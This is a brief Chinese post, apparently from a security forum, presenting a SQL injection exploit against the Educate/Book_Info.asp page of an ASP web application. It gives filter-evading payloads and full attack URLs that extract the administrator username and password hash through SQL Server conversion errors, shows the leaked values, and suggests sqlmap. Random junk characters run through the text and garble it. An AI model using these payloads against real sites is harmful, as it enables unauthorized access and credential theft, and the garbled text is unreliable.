漏洞出现在Educate/Book_Info.asp ' K0 _) V3 S9 }3 \
+ ^6 g( L4 D0 T7 C. C) d
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
: Q4 `, }( V. A; g- i - W- g3 t0 X2 Z1 X8 j8 A- N
exp:如下
8 D: e8 ~: B' [- v2 c1 K8 y查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)( c2 W3 u: A* K1 |1 _: G
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)1 q# D! f. z$ d' K; `4 H2 K
$ ~7 X# R( M+ \( r1 {6 W0 ~. k! P
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)" k+ ^2 `: x* i# w) z) n% G$ D$ f
- W ^5 h: l7 E5 N
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'% \# q1 I$ ~- |- v
* U8 |, l- B/ z
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
! G5 |% m z. T/ B! _ ' z- g/ _4 w" g* }
/Educate/Book_Info.asp,行 8# H6 v# V# c+ Z( F4 I
a( m& U- P4 G* s- uhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ S% F& G. v9 h Y% L3 r # c! p+ g) h. ]4 F& I8 ]9 g
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
% ?" W$ N: t e! x 7 d! i1 Y0 A; }8 i
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
' T6 j: k8 N# W* X1 A6 ^ 9 [7 Z2 _9 J& f
/Educate/Book_Info.asp,行 8. T1 A9 [& r9 U1 }; E1 O
|